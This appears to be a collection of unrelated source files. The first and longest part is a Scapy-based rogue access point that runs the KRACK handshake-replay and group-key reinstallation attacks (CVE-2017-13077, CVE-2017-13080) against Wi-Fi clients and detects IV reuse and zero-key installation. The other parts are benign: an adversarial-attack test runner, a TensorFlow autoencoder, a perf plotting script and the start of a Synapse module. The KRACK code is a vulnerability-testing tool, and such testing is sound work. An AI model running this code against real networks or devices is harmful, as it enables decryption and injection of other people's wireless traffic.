wait_gtk: time to wait (in sec.) before sending the GTK rekeying
arp_target_ip: Client IP to use in ARP req. (to detect attack success)
If None, use a DHCP server
arp_source_ip: Server IP to use in ARP req. (to detect attack success)
If None, use the DHCP server gateway address
"""
super(KrackAP, self).parse_args(**kwargs)
# Main AP options
self.mac = ap_mac
self.ssid = ssid
self.passphrase = passphrase
if channel is None:
if WINDOWS:
try:
channel = kwargs.get("iface", conf.iface).channel()
except (Scapy_Exception, AttributeError):
channel = 6
else:
channel = 6
self.channel = channel
# Internal structures
self.last_iv = None
self.client = None
self.seq_num = count()
self.replay_counter = count()
self.time_handshake_end = None
self.dhcp_server = DHCPOverWPA(send_func=self.send_ether_over_wpa,
pool=Net("192.168.42.128/25"),
network="192.168.42.0/24",
gw="192.168.42.1")
self.arp_sent = []
self.arp_to_send = 0
self.arp_retry = 0
# Bit 0: 3way handshake sent
# Bit 1: GTK rekeying sent
# Bit 2: ARP response obtained
self.krack_state = 0
# Krack options
self.double_3handshake = double_3handshake
self.encrypt_3handshake = encrypt_3handshake
self.wait_3handshake = wait_3handshake
self.double_gtk_refresh = double_gtk_refresh
self.arp_target_ip = arp_target_ip
if arp_source_ip is None:
# Use the DHCP server Gateway address
arp_source_ip = self.dhcp_server.gw
self.arp_source_ip = arp_source_ip
self.wait_gtk = wait_gtk
# May take several seconds
self.install_PMK()
def run(self, *args, **kwargs):
log_runtime.warning("AP started with ESSID: %s, BSSID: %s",
self.ssid, self.mac)
super(KrackAP, self).run(*args, **kwargs)
# Key utils
@staticmethod
def gen_nonce(size):
"""Return a nonce of @size element of random bytes as a string"""
return raw(RandBin(size))
def install_PMK(self):
"""Compute and install the PMK"""
self.pmk = PBKDF2HMAC(
algorithm=hashes.SHA1(),
length=32,
salt=self.ssid.encode(),
iterations=4096,
backend=default_backend(),
).derive(self.passphrase.encode())
def install_unicast_keys(self, client_nonce):
"""Use the client nonce @client_nonce to compute and install
PTK, KCK, KEK, TK, MIC (AP -> STA), MIC (STA -> AP)
"""
pmk = self.pmk
anonce = self.anonce
snonce = client_nonce
amac = mac2str(self.mac)
smac = mac2str(self.client)
# Compute PTK
self.ptk = customPRF512(pmk, amac, smac, anonce, snonce)
# Extract derivated keys
self.kck = self.ptk[:16]
self.kek = self.ptk[16:32]
self.tk = self.ptk[32:48]
self.mic_ap_to_sta = self.ptk[48:56]
self.mic_sta_to_ap = self.ptk[56:64]
# Reset IV
self.client_iv = count()
def install_GTK(self):
"""Compute a new GTK and install it alongs
MIC (AP -> Group = broadcast + multicast)
"""
# Compute GTK
self.gtk_full = self.gen_nonce(32)
self.gtk = self.gtk_full[:16]
# Extract derivated keys
self.mic_ap_to_group = self.gtk_full[16:24]
# Reset IV
self.group_iv = count()
# Packet utils
def build_ap_info_pkt(self, layer_cls, dest):
"""Build a packet with info describing the current AP
For beacon / proberesp use
"""
return RadioTap() \
/ Dot11(addr1=dest, addr2=self.mac, addr3=self.mac) \
/ layer_cls(timestamp=0, beacon_interval=100,
cap='ESS+privacy') \
/ Dot11Elt(ID="SSID", info=self.ssid) \
/ Dot11EltRates(rates=[130, 132, 139, 150, 12, 18, 24, 36]) \
/ Dot11Elt(ID="DSset", info=chb(self.channel)) \
/ Dot11EltRSN(group_cipher_suite=RSNCipherSuite(cipher=0x2),
pairwise_cipher_suites=[RSNCipherSuite(cipher=0x2)],
akm_suites=[AKMSuite(suite=0x2)])
@staticmethod
def build_EAPOL_Key_8021X2004(
key_information,
replay_counter,
nonce,
data=None,
key_mic=None,
key_data_encrypt=None,
key_rsc=0,
key_id=0,
key_descriptor_type=2, # EAPOL RSN Key
):
pkt = EAPOL(version="802.1X-2004", type="EAPOL-Key")
key_iv = KrackAP.gen_nonce(16)
assert key_rsc == 0 # Other values unsupported
assert key_id == 0 # Other values unsupported
payload = b"".join([
chb(key_descriptor_type),
struct.pack(">H", key_information),
b'\x00\x20', # Key length
struct.pack(">Q", replay_counter),
nonce,
key_iv,
struct.pack(">Q", key_rsc),
struct.pack(">Q", key_id),
])
# MIC field is set to 0's during MIC computation
offset_MIC = len(payload)
payload += b'\x00' * 0x10
if data is None and key_mic is None and key_data_encrypt is None:
# If key is unknown and there is no data, no MIC is needed
# Example: handshake 1/4
payload += b'\x00' * 2 # Length
return pkt / Raw(load=payload)
assert data is not None
assert key_mic is not None
assert key_data_encrypt is not None
# Skip 256 first bytes
# REF: 802.11i 8.5.2
# Key Descriptor Version 1:
# ...
# No padding shall be used. The encryption key is generated by
# concatenating the EAPOL-Key IV field and the KEK. The first 256 octets # noqa: E501
# of the RC4 key stream shall be discarded following RC4 stream cipher
# initialization with the KEK, and encryption begins using the 257th key # noqa: E501
# stream octet.
enc_data = ARC4_encrypt(key_iv + key_data_encrypt, data, skip=256)
payload += struct.pack(">H", len(data))
payload += enc_data
# Compute MIC and set at the right place
temp_mic = pkt.copy()
temp_mic /= Raw(load=payload)
to_mic = raw(temp_mic[EAPOL])
mic = hmac.new(key_mic, to_mic, hashlib.md5).digest()
final_payload = payload[:offset_MIC] + mic + payload[offset_MIC + len(mic):] # noqa: E501
assert len(final_payload) == len(payload)
return pkt / Raw(load=final_payload)
def build_GTK_KDE(self):
"""Build the Key Data Encapsulation for GTK
KeyID: 0
Ref: 802.11i p81
"""
return b''.join([
b'\xdd', # Type KDE
chb(len(self.gtk_full) + 6),
b'\x00\x0f\xac', # OUI
b'\x01', # GTK KDE
b'\x00\x00', # KeyID - Tx - Reserved x2
self.gtk_full,
])
def send_wpa_enc(self, data, iv, seqnum, dest, mic_key,
key_idx=0, additionnal_flag=["from-DS"],
encrypt_key=None):
"""Send an encrypted packet with content @data, using IV @iv,
sequence number @seqnum, MIC key @mic_key
"""
if encrypt_key is None:
encrypt_key = self.tk
rep = RadioTap()
rep /= Dot11(
addr1=dest,
addr2=self.mac,
addr3=self.mac,
FCfield="+".join(['protected'] + additionnal_flag),
SC=(next(self.seq_num) << 4),
subtype=0,
type="Data",
)
# Assume packet is send by our AP -> use self.mac as source
# Encapsule in TKIP with MIC Michael and ICV
data_to_enc = build_MIC_ICV(raw(data), mic_key, self.mac, dest)
# Header TKIP + payload
rep /= Raw(build_TKIP_payload(data_to_enc, iv, self.mac, encrypt_key))
self.send(rep)
return rep
def send_wpa_to_client(self, data, **kwargs):
kwargs.setdefault("encrypt_key", self.tk)
return self.send_wpa_enc(data, next(self.client_iv),
next(self.seq_num), self.client,
self.mic_ap_to_sta, **kwargs)
def send_wpa_to_group(self, data, dest="ff:ff:ff:ff:ff:ff", **kwargs):
kwargs.setdefault("encrypt_key", self.gtk)
return self.send_wpa_enc(data, next(self.group_iv),
next(self.seq_num), dest,
self.mic_ap_to_group, **kwargs)
def send_ether_over_wpa(self, pkt, **kwargs):
"""Send an Ethernet packet using the WPA channel
Extra arguments will be ignored, and are just left for compatibility
"""
payload = LLC() / SNAP() / pkt[Ether].payload
dest = pkt.dst
if dest == "ff:ff:ff:ff:ff:ff":
self.send_wpa_to_group(payload, dest)
else:
assert dest == self.client
self.send_wpa_to_client(payload)
def deal_common_pkt(self, pkt):
# Send to DHCP server
# LLC / SNAP to Ether
if SNAP in pkt:
ether_pkt = Ether(src=self.client, dst=self.mac) / pkt[SNAP].payload # noqa: E501
self.dhcp_server.reply(ether_pkt)
# If an ARP request is made, extract client IP and answer
if ARP in pkt and \
pkt[ARP].op == 1 and pkt[ARP].pdst == self.dhcp_server.gw:
if self.arp_target_ip is None:
self.arp_target_ip = pkt[ARP].psrc
log_runtime.info("Detected IP: %s", self.arp_target_ip)
# Reply
ARP_ans = LLC() / SNAP() / ARP(
op="is-at",
psrc=self.arp_source_ip,
pdst=self.arp_target_ip,
hwsrc=self.mac,
hwdst=self.client,
)
self.send_wpa_to_client(ARP_ans)
# States
@ATMT.state(initial=True)
def WAIT_AUTH_REQUEST(self):
log_runtime.debug("State WAIT_AUTH_REQUEST")
@ATMT.state()
def AUTH_RESPONSE_SENT(self):
log_runtime.debug("State AUTH_RESPONSE_SENT")
@ATMT.state()
def ASSOC_RESPONSE_SENT(self):
log_runtime.debug("State ASSOC_RESPONSE_SENT")
@ATMT.state()
def WPA_HANDSHAKE_STEP_1_SENT(self):
log_runtime.debug("State WPA_HANDSHAKE_STEP_1_SENT")
@ATMT.state()
def WPA_HANDSHAKE_STEP_3_SENT(self):
log_runtime.debug("State WPA_HANDSHAKE_STEP_3_SENT")
@ATMT.state()
def KRACK_DISPATCHER(self):
log_runtime.debug("State KRACK_DISPATCHER")
@ATMT.state()
def ANALYZE_DATA(self):
log_runtime.debug("State ANALYZE_DATA")
@ATMT.timeout(ANALYZE_DATA, 1)
def timeout_analyze_data(self):
raise self.KRACK_DISPATCHER()
@ATMT.state()
def RENEW_GTK(self):
log_runtime.debug("State RENEW_GTK")
@ATMT.state()
def WAIT_GTK_ACCEPT(self):
log_runtime.debug("State WAIT_GTK_ACCEPT")
@ATMT.state()
def WAIT_ARP_REPLIES(self):
log_runtime.debug("State WAIT_ARP_REPLIES")
@ATMT.state(final=1)
def EXIT(self):
log_runtime.debug("State EXIT")
@ATMT.timeout(WAIT_GTK_ACCEPT, 1)
def timeout_wait_gtk_accept(self):
raise self.RENEW_GTK()
@ATMT.timeout(WAIT_AUTH_REQUEST, 0.1)
def timeout_waiting(self):
raise self.WAIT_AUTH_REQUEST()
@ATMT.action(timeout_waiting)
def send_beacon(self):
log_runtime.debug("Send a beacon")
rep = self.build_ap_info_pkt(Dot11Beacon, dest="ff:ff:ff:ff:ff:ff")
self.send(rep)
@ATMT.receive_condition(WAIT_AUTH_REQUEST)
def probe_request_received(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
if Dot11ProbeReq in pkt and pkt[Dot11Elt::{'ID': 0}].info == self.ssid:
raise self.WAIT_AUTH_REQUEST().action_parameters(pkt)
@ATMT.action(probe_request_received)
def send_probe_response(self, pkt):
rep = self.build_ap_info_pkt(Dot11ProbeResp, dest=pkt.addr2)
self.send(rep)
@ATMT.receive_condition(WAIT_AUTH_REQUEST)
def authent_received(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
if Dot11Auth in pkt and pkt.addr1 == pkt.addr3 == self.mac:
raise self.AUTH_RESPONSE_SENT().action_parameters(pkt)
@ATMT.action(authent_received)
def send_auth_response(self, pkt):
# Save client MAC for later
self.client = pkt.addr2
log_runtime.warning("Client %s connected!", self.client)
# Launch DHCP Server
self.dhcp_server.run()
rep = RadioTap()
rep /= Dot11(addr1=self.client, addr2=self.mac, addr3=self.mac)
rep /= Dot11Auth(seqnum=2, algo=pkt[Dot11Auth].algo,
status=pkt[Dot11Auth].status)
self.send(rep)
@ATMT.receive_condition(AUTH_RESPONSE_SENT)
def assoc_received(self, pkt):
if Dot11AssoReq in pkt and pkt.addr1 == pkt.addr3 == self.mac and \
pkt[Dot11Elt::{'ID': 0}].info == self.ssid:
raise self.ASSOC_RESPONSE_SENT().action_parameters(pkt)
@ATMT.action(assoc_received)
def send_assoc_response(self, pkt):
# Get RSN info
temp_pkt = pkt[Dot11Elt::{"ID": 48}].copy()
temp_pkt.remove_payload()
self.RSN = raw(temp_pkt)
# Avoid 802.11w, etc. (deactivate RSN capabilities)
self.RSN = self.RSN[:-2] + b"\x00\x00"
rep = RadioTap()
rep /= Dot11(addr1=self.client, addr2=self.mac, addr3=self.mac)
rep /= Dot11AssoResp()
rep /= Dot11EltRates(rates=[130, 132, 139, 150, 12, 18, 24, 36])
self.send(rep)
@ATMT.condition(ASSOC_RESPONSE_SENT)
def assoc_sent(self):
raise self.WPA_HANDSHAKE_STEP_1_SENT()
@ATMT.action(assoc_sent)
def send_wpa_handshake_1(self):
self.anonce = self.gen_nonce(32)
rep = RadioTap()
rep /= Dot11(
addr1=self.client,
addr2=self.mac,
addr3=self.mac,
FCfield='from-DS',
SC=(next(self.seq_num) << 4),
)
rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
rep /= self.build_EAPOL_Key_8021X2004(
key_information=0x89,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
)
self.send(rep)
@ATMT.receive_condition(WPA_HANDSHAKE_STEP_1_SENT)
def wpa_handshake_1_sent(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
if EAPOL in pkt and pkt.addr1 == pkt.addr3 == self.mac and \
pkt[EAPOL].load[1:2] == b"\x01":
# Key MIC: set, Secure / Error / Request / Encrypted / SMK
# message: not set
raise self.WPA_HANDSHAKE_STEP_3_SENT().action_parameters(pkt)
@ATMT.action(wpa_handshake_1_sent)
def send_wpa_handshake_3(self, pkt):
# Both nonce have been exchanged, install keys
client_nonce = pkt[EAPOL].load[13:13 + 0x20]
self.install_unicast_keys(client_nonce)
# Check client MIC
# Data: full message with MIC place replaced by 0s
# https://stackoverflow.com/questions/15133797/creating-wpa-message-integrity-code-mic-with-python
client_mic = pkt[EAPOL].load[77:77 + 16]
client_data = raw(pkt[EAPOL]).replace(client_mic, b"\x00" * len(client_mic)) # noqa: E501
assert hmac.new(self.kck, client_data, hashlib.md5).digest() == client_mic # noqa: E501
rep = RadioTap()
rep /= Dot11(
addr1=self.client,
addr2=self.mac,
addr3=self.mac,
FCfield='from-DS',
SC=(next(self.seq_num) << 4),
)
rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
self.install_GTK()
data = self.RSN
data += self.build_GTK_KDE()
eap = self.build_EAPOL_Key_8021X2004(
key_information=0x13c9,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
data=data,
key_mic=self.kck,
key_data_encrypt=self.kek,
)
self.send(rep / eap)
@ATMT.receive_condition(WPA_HANDSHAKE_STEP_3_SENT)
def wpa_handshake_3_sent(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
if EAPOL in pkt and pkt.addr1 == pkt.addr3 == self.mac and \
pkt[EAPOL].load[1:3] == b"\x03\x09":
self.time_handshake_end = time.time()
raise self.KRACK_DISPATCHER()
@ATMT.condition(KRACK_DISPATCHER)
def krack_dispatch(self):
now = time.time()
# Handshake 3/4 replay
if self.double_3handshake and (self.krack_state & 1 == 0) and \
(now - self.time_handshake_end) > self.wait_3handshake:
log_runtime.info("Trying to trigger CVE-2017-13077")
raise self.ANALYZE_DATA().action_parameters(send_3handshake=True)
# GTK rekeying
if (self.krack_state & 2 == 0) and \
(now - self.time_handshake_end) > self.wait_gtk:
raise self.ANALYZE_DATA().action_parameters(send_gtk=True)
# Fallback in data analysis
raise self.ANALYZE_DATA().action_parameters()
@ATMT.action(krack_dispatch)
def krack_proceed(self, send_3handshake=False, send_gtk=False):
if send_3handshake:
rep = RadioTap()
rep /= Dot11(
addr1=self.client,
addr2=self.mac,
addr3=self.mac,
FCfield='from-DS',
SC=(next(self.seq_num) << 4),
subtype=0,
type="Data",
)
rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
data = self.RSN
data += self.build_GTK_KDE()
eap_2 = self.build_EAPOL_Key_8021X2004(
# Key information 0x13c9:
# ARC4 HMAC-MD5, Pairwise Key, Install, KEY ACK, KEY MIC, Secure, # noqa: E501
# Encrypted, SMK
key_information=0x13c9,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
data=data,
key_mic=self.kck,
key_data_encrypt=self.kek,
)
rep /= eap_2
if self.encrypt_3handshake:
self.send_wpa_to_client(rep[LLC])
else:
self.send(rep)
self.krack_state |= 1
if send_gtk:
self.krack_state |= 2
# Renew the GTK
self.install_GTK()
raise self.RENEW_GTK()
@ATMT.receive_condition(ANALYZE_DATA)
def get_data(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
# Skip retries
if pkt[Dot11].FCfield.retry:
return
# Skip unencrypted frames (TKIP rely on encrypted packets)
if not pkt[Dot11].FCfield.protected:
return
# Dot11.type 2: Data
if pkt.type == 2 and Raw in pkt and pkt.addr1 == self.mac:
# Do not check pkt.addr3, frame can be broadcast
raise self.KRACK_DISPATCHER().action_parameters(pkt)
@ATMT.action(get_data)
def extract_iv(self, pkt):
# Get IV
TSC, _, _ = parse_TKIP_hdr(pkt)
iv = TSC[0] | (TSC[1] << 8) | (TSC[2] << 16) | (TSC[3] << 24) | \
(TSC[4] << 32) | (TSC[5] << 40)
log_runtime.info("Got a packet with IV: %s", hex(iv))
if self.last_iv is None:
self.last_iv = iv
else:
if iv <= self.last_iv:
log_runtime.warning("IV re-use!! Client seems to be "
"vulnerable to handshake 3/4 replay "
"(CVE-2017-13077)"
)
data_clear = None
# Normal decoding
data = parse_data_pkt(pkt, self.tk)
try:
data_clear = check_MIC_ICV(data, self.mic_sta_to_ap, pkt.addr2,
pkt.addr3)
except (ICVError, MICError):
pass
# Decoding with a 0's TK
if data_clear is None:
data = parse_data_pkt(pkt, b"\x00" * len(self.tk))
try:
mic_key = b"\x00" * len(self.mic_sta_to_ap)
data_clear = check_MIC_ICV(data, mic_key, pkt.addr2, pkt.addr3)
log_runtime.warning("Client has installed an all zero "
"encryption key (TK)!!")
except (ICVError, MICError):
pass
if data_clear is None:
log_runtime.warning("Unable to decode the packet, something went "
"wrong")
log_runtime.debug(hexdump(pkt, dump=True))
self.deal_common_pkt(pkt)
return
log_runtime.debug(hexdump(data_clear, dump=True))
pkt = LLC(data_clear)
log_runtime.debug(repr(pkt))
self.deal_common_pkt(pkt)
@ATMT.condition(RENEW_GTK)
def gtk_pkt_1(self):
raise self.WAIT_GTK_ACCEPT()
@ATMT.action(gtk_pkt_1)
def send_renew_gtk(self):
rep_to_enc = LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep_to_enc /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
data = self.build_GTK_KDE()
eap = self.build_EAPOL_Key_8021X2004(
# Key information 0x1381:
# ARC4 HMAC-MD5, Group Key, KEY ACK, KEY MIC, Secure, Encrypted,
# SMK
key_information=0x1381,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
data=data,
key_mic=self.kck,
key_data_encrypt=self.kek,
)
rep_to_enc /= eap
self.send_wpa_to_client(rep_to_enc)
@ATMT.receive_condition(WAIT_GTK_ACCEPT)
def get_gtk_2(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
# Skip retries
if pkt[Dot11].FCfield.retry:
return
# Skip unencrypted frames (TKIP rely on encrypted packets)
if not pkt[Dot11].FCfield.protected:
return
# Normal decoding
try:
data = parse_data_pkt(pkt, self.tk)
except ValueError:
return
try:
data_clear = check_MIC_ICV(data, self.mic_sta_to_ap, pkt.addr2,
pkt.addr3)
except (ICVError, MICError):
return
pkt_clear = LLC(data_clear)
if EAPOL in pkt_clear and pkt.addr1 == pkt.addr3 == self.mac and \
pkt_clear[EAPOL].load[1:3] == b"\x03\x01":
raise self.WAIT_ARP_REPLIES()
@ATMT.action(get_gtk_2)
def send_arp_req(self):
if self.krack_state & 4 == 0:
# Set the address for future uses
self.arp_target_ip = self.dhcp_server.leases.get(self.client,
self.arp_target_ip) # noqa: E501
assert self.arp_target_ip is not None
# Send the first ARP requests, for control test
log_runtime.info("Send ARP who-was from '%s' to '%s'",
self.arp_source_ip,
self.arp_target_ip)
arp_pkt = self.send_wpa_to_group(
LLC() / SNAP() / ARP(op="who-has",
psrc=self.arp_source_ip,
pdst=self.arp_target_ip,
hwsrc=self.mac),
dest='ff:ff:ff:ff:ff:ff',
)
self.arp_sent.append(arp_pkt)
else:
if self.arp_to_send < len(self.arp_sent):
# Re-send the ARP requests already sent
self.send(self.arp_sent[self.arp_to_send])
self.arp_to_send += 1
else:
# Re-send GTK
self.arp_to_send = 0
self.arp_retry += 1
log_runtime.info("Trying to trigger CVE-2017-13080 %d/%d",
self.arp_retry, self.ARP_MAX_RETRY)
if self.arp_retry > self.ARP_MAX_RETRY:
# We retries 100 times to send GTK, then already sent ARPs
log_runtime.warning("Client is likely not vulnerable to "
"CVE-2017-13080")
raise self.EXIT()
raise self.RENEW_GTK()
@ATMT.timeout(WAIT_ARP_REPLIES, 0.5)
def resend_arp_req(self):
self.send_arp_req()
raise self.WAIT_ARP_REPLIES()
@ATMT.receive_condition(WAIT_ARP_REPLIES)
def get_arp(self, pkt):
# Avoid packet from other interfaces
if RadioTap not in pkt:
return
# Skip retries
if pkt[Dot11].FCfield.retry:
return
# Skip unencrypted frames (TKIP rely on encrypted packets)
if not pkt[Dot11].FCfield.protected:
return
# Dot11.type 2: Data
if pkt.type == 2 and Raw in pkt and pkt.addr1 == self.mac:
# Do not check pkt.addr3, frame can be broadcast
raise self.WAIT_ARP_REPLIES().action_parameters(pkt)
@ATMT.action(get_arp)
def check_arp_reply(self, pkt):
data = parse_data_pkt(pkt, self.tk)
try:
data_clear = check_MIC_ICV(data, self.mic_sta_to_ap, pkt.addr2,
pkt.addr3)
except (ICVError, MICError):
return
decoded_pkt = LLC(data_clear)
log_runtime.debug(hexdump(decoded_pkt, dump=True))
log_runtime.debug(repr(decoded_pkt))
self.deal_common_pkt(decoded_pkt)
if ARP not in decoded_pkt:
return
# ARP.op 2: is-at
if decoded_pkt[ARP].op == 2 and \
decoded_pkt[ARP].psrc == self.arp_target_ip and \
decoded_pkt[ARP].pdst == self.arp_source_ip:
# Got the expected ARP
if self.krack_state & 4 == 0:
# First time, normal behavior
log_runtime.info("Got ARP reply, this is normal")
self.krack_state |= 4
log_runtime.info("Trying to trigger CVE-2017-13080")
raise self.RENEW_GTK()
else:
# Second time, the packet has been accepted twice!
log_runtime.warning("Broadcast packet accepted twice!! "
"(CVE-2017-13080)")
|
the-stack_106_15808
|
#pylint: disable-all
"""
Test a final model with distance attacks
"""
import os
import copy
import argparse
import subprocess
import yaml
if __name__ == "__main__":
TEST_TYPES = {
"BIM_L2": {
"adversary_type": "L2BasicIterativeAttack",
"distance_type": "MeanSquaredDistance"
},
"BIM_LINF": {
"adversary_type": "LinfinityBasicIterativeAttack",
"distance_type": "Linfinity"
},
"CW_L2": {
"adversary_type": "CarliniWagnerL2Attack",
"distance_type": "MeanSquaredDistance"
},
"DEEPFOOL_L2": {
"adversary_type": "DeepFoolL2Attack",
"distance_type": "MeanSquaredDistance"
}
}
parser = argparse.ArgumentParser()
parser.add_argument("cfg_file")
parser.add_argument("load")
parser.add_argument("--type", "-t", required=True, action="append", default=[], help="distance attack type", choices=list(TEST_TYPES.keys()) + [t.lower() for t in TEST_TYPES.keys()])
parser.add_argument("--gpu", default=0, type=int)
args = parser.parse_args()
with open(args.cfg_file, "r") as rf:
base_cfg = yaml.load(rf)
test_cfg_files = []
log_files = []
for test_type in args.type:
cfg = copy.deepcopy(base_cfg)
cfg["objective_type"] = "adversarial_distance_objective"
cfg["objective_cfg"] = {}
cfg["objective_cfg"]["mean"] = base_cfg["objective_cfg"]["mean"]
cfg["objective_cfg"]["std"] = base_cfg["objective_cfg"]["std"]
cfg["objective_cfg"]["num_classes"] = base_cfg["objective_cfg"].get(
"num_classes",
base_cfg["final_model_cfg"].get("num_classes",10))
cfg["objective_cfg"].update(TEST_TYPES[test_type.upper()])
test_cfg_files.append("{}-test-{}.yaml".format(args.cfg_file, test_type.upper()))
log_files.append(os.path.join(args.load, "test-{}.log".format(test_type.upper())))
with open(test_cfg_files[-1], "w") as wf:
yaml.dump(cfg, wf)
for test_type, test_cfg_file, log_file in zip(args.type, test_cfg_files, log_files):
print("****Test {}. Test cfg: {}. Log saved to {}.****".format(test_type, test_cfg_file, log_file))
subprocess.check_call("awnas test --load {} {} --gpus {} -s test 2>&1 | tee {}".format(args.load, test_cfg_file, args.gpu, log_file), shell=True)
|
the-stack_106_15809
|
import numpy as np
from multiphenotype_utils import (get_continuous_features_as_matrix, add_id, remove_id_and_get_mat,
partition_dataframe_into_binary_and_continuous, divide_idxs_into_batches)
import pandas as pd
import tensorflow as tf
from dimreducer import DimReducer
from general_autoencoder import GeneralAutoencoder
from standard_autoencoder import StandardAutoencoder
from variational_autoencoder import VariationalAutoencoder
from variational_age_autoencoder import VariationalAgeAutoencoder
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
class SparseCorrelationVariationalAgeAutoencoder(VariationalAgeAutoencoder):
"""
Implements a variational autoencoder with an age prior and sparsity on the X-Z correlation matrix.
"""
def __init__(self,
k_age,
Z_age_coef,
sparsity_weighting = .1,
batch_size=512,
min_corr_value = .05,
use_age_adjusted_X=True,
**kwargs):
super(SparseCorrelationVariationalAgeAutoencoder, self).__init__(k_age = k_age,
Z_age_coef = Z_age_coef,
batch_size=batch_size,
**kwargs)
self.sparsity_weighting = sparsity_weighting # weighting on the L1 X-Z correlation matrix loss.
self.use_age_adjusted_X = use_age_adjusted_X # if True, computes correlations with the age state using X that has been decorrelated with age.
self.min_corr_value = min_corr_value # correlations below this value are treated as equivalent.
def compute_pearson_correlation(self, v1, v2):
"""
slow (non-vectorized) way of computing the pearson correlation.
pearson correlation:
https://en.wikipedia.org/wiki/Correlation_and_dependence
Not being used at present .
Verified that this matches up with pearsonr(x, y) for random vectors.
"""
# The mean and variance are calculated by aggregating the contents of x across axes.
# If x is 1-D and axes = [0] this is just the mean and variance of a vector.
mu_1, variance_1 = tf.nn.moments(v1, axes=[0])
mu_2, variance_2 = tf.nn.moments(v2, axes=[0])
sigma_1 = tf.sqrt(variance_1)
sigma_2 = tf.sqrt(variance_2)
pearsonr = tf.reduce_mean((v1 - mu_1) * (v2 - mu_2)) / (sigma_1 * sigma_2)
return pearsonr
def compute_correlation_sparsity_loss(self, Z, X):
"""
this is a vectorized version of the above function which is faster but equivalent.
Verified that it agrees with pearsonr on random matrices.
"""
mu_X, variance_X = tf.nn.moments(X, axes=[0])
mu_Z, variance_Z = tf.nn.moments(Z, axes=[0])
std_X = tf.reshape(tf.sqrt(variance_X), shape=[len(self.feature_names), 1])
std_Z = tf.reshape(tf.sqrt(variance_Z), shape=[1, tf.shape(variance_Z)[0]])
zero_mean_X = X - mu_X # this subtracts off the mean of each column of X.
zero_mean_Z = Z - mu_Z # similarly for Z.
n_samples = tf.cast(tf.shape(X)[0], tf.float32)
expected_product = tf.matmul(tf.transpose(zero_mean_X), zero_mean_Z) / n_samples
product_of_stds = tf.matmul(std_X, std_Z)
pearsonr_matrix = expected_product / product_of_stds
clipped_pearsonr_matrix = tf.clip_by_value(tf.abs(pearsonr_matrix), self.min_corr_value, np.inf)
sparsity_loss = tf.reduce_sum(clipped_pearsonr_matrix)
return sparsity_loss
def set_up_regularization_loss_structure(self):
"""
This function sets up the basic loss structure. Should define self.reg_loss.
"""
self.reg_loss = self.get_regularization_loss(self.ages,
self.Z_mu,
self.Z_sigma,
self.Z,
self.X,
self.age_adjusted_X)
def get_regularization_loss(self, ages, Z_mu, Z_sigma, Z, X, age_adjusted_X):
"""
Adds a correlation sparsity loss to the regularization term.
"""
kl_div_loss = super(SparseCorrelationVariationalAgeAutoencoder, self).get_regularization_loss(ages,
Z_mu,
Z_sigma)
if self.use_age_adjusted_X:
# for non-age states, use correlation with X to compute sparsity loss.
# for age states, use correlation with age_adjusted_X.
sparsity_loss = self.compute_correlation_sparsity_loss(Z[:, self.k_age:], X)
if self.k_age > 0:
sparsity_loss += self.compute_correlation_sparsity_loss(Z[:, :self.k_age], age_adjusted_X)
else:
# if we're not using age adjusted X for the age states, just compute the sparse correlation matrix with X.
sparsity_loss = self.compute_correlation_sparsity_loss(Z, X)
regularization_loss = kl_div_loss + sparsity_loss * self.sparsity_weighting
return regularization_loss
|
the-stack_106_15812
|
#!/usr/bin/env python
# plot already normalized data
# first column is time stamp
#plot-normalized.py taken from PMU-tools
import csv
import matplotlib.pyplot as plt
import sys
import argparse
ap = argparse.ArgumentParser(usage='Plot already normalized CSV data')
ap.add_argument('--output', '-o', help='Output to file. Otherwise show.',
nargs='?')
ap.add_argument('inf', nargs='?', default=sys.stdin, type=argparse.FileType('r'),
help='input CSV file')
args = ap.parse_args()
inf = args.inf
rc = csv.reader(inf)
num = 0
timestamps = []
columns = dict()
for r in rc:
num += 1
if num == 1:
for j in r[1:]:
columns[j] = []
continue
timestamps.append(r[0])
c = 1
for j in columns:
try:
columns[j].append(float(r[c]))
except ValueError:
columns[j].append(float('nan'))
c += 1
#edit PMU-tools plot-normalized.py to get branch misses
LLC = []
for j, k in zip(columns['instructions'],columns['LLC-load-misses']):
if(j==0):
LLC.append(LLC[-1])
continue
else:
LLC_val = (float(k)/float(j)/1000)
LLC.append(LLC_val)
plt.plot(timestamps,LLC,'b-',label='LLC')
plt.title('Time vs. LLC_load_misses')
plt.xlabel('Seconds')
plt.ylabel('LLC MPK')
leg = plt.legend()
leg.get_frame().set_alpha(0.5)
if args.output:
plt.savefig(args.output)
#plt.show()
else:
plt.show()
|
the-stack_106_15815
|
# -*- coding: utf-8 -*-
# Copyright 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import re
from typing import TYPE_CHECKING, Dict, Iterable, Optional
from synapse.api.constants import EventTypes, Membership
from synapse.events import EventBase
from synapse.types import StateMap
if TYPE_CHECKING:
from synapse.storage.databases.main import DataStore
logger = logging.getLogger(__name__)
# intentionally looser than what aliases we allow to be registered since
# other HSes may allow aliases that we would not
ALIAS_RE = re.compile(r"^#.*:.+$")
ALL_ALONE = "Empty Room"
async def calculate_room_name(
store: "DataStore",
room_state_ids: StateMap[str],
user_id: str,
